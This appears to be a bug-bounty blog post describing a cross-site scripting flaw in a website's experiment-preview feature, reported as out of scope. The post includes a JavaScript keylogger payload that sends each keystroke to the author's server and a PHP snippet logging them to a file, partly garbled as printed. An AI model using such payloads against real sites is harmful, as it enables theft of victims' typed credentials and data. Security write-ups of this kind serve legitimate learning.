Don’t just alert(1) , Because XSS is for fun…!!

Armaan Pathan
Sep 2, 2017 · 3 min read
Image for post
Image for post

It was weekend and i was reading some good blogs and looking for good tweets.So after reading some good blog i had decided to give them a try. so this time i chose because i had never hunted on this platform so why not give a try.

I had selected my target. which was and started looking for some cool bugs.

In the application i had found a module which is Create Experiment

Image for post
Image for post

here you have to enter your website’s URL and give a name and you can do experiments on your website.

So simply i had fill up the form by entering my website and given the Experiment name.and my website was loaded into the module, now here i was able to do experiments on my web application.

Now there was an option to preview your experiments, Now this option will open the new tab and it will show the experiments which you have done with your application, so first i had not done any experiments and clicked on Preview. So it has opened in the new tab and it has opened my website into it.

Now as it was loading my website within this so i though lets give a try.

i had wrote <script>prompt(docoument.domain);</script> into my site and again i put my site into the experiments.and again i clicked on has opened in the new tab, but at this time instead of prompting my domain’s name into the pop-up it has prompted :) so yes here i was able to call scripts on the from the different domain.

Image for post
Image for post

I wanted to exploit this xss. so i decided to write small javascript which records the key strokes and give that strokes back to my server where i have hosted my website.

So i wrote this to record the keystrokes

document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)“POST”,”",true);

and also wrote this to give that keystrokes back to my server and make keylog.txt file and save the keystrokes.

$fp = fopen($logfile, “a”);
fwrite($fp, $key);

and after writing this i had updated my website. now what this do, as soon as the page loads the javascript starts recording the keystrokes and makes a file keylog.txt and saves all the logs.

now again i put my site into the experiments.and again i clicked on has opened and it has started logging key logs to my server and made a file keylog.txt

Image for post
Image for post

and if now if i send this link to any victim it starts logging all keystrokes which victim types. and if i open the keylog.txt file it will look like this.

Image for post
Image for post

but unfortunately the team said that this domain is not in the scope :(.

but yeah. i had learn many things from this. :D

I hope you guys have like it. :)
Thanks for reading.
Have Great Day.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store